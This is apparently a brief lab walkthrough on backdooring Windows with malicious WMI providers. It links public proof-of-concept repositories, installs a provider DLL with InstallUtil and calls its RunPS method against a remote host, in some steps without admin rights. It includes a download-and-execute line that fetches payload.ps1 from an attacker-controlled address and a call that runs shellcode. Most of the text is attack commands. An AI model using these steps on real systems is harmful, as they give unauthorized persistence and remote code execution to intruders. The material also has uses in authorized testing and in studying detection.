Backdoor with WMI

Win32 localadmins provider:

One of the earlier poc evil WMI provider:

https://github.com/rzander/localadmins

Evil Network connection WMI Provider:

https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider

Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug):

C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll

On another ps:

Here we can see win32_netconnection in output.

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list

PS C:\Users\victim6\Downloads>  Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList “Get-Host”

We can try this now on no admin ps also to get the info:

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “whoami”

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “hostname”

PS C:\Users\victim6> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “ipconfig”

To execute a powershell script:

PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_netconnection -ComputerName 192.168.222.130 -name RunPS -ArgumentList “iex” (New-object net.webclient).downloadstring(‘http://192.168.222.131/payload.ps1’)

Malicious WMI providers: Evil WMI provider.

https://github.com/subtee/EvilWMIProvider

Execute Shellcode: PS C:\Users\victim6\Downloads> invoke-wmimethod -class win32_evil -name execshellcode -ArgumentList @(0x90,0x90,0x90),$null

@Saksham Dixit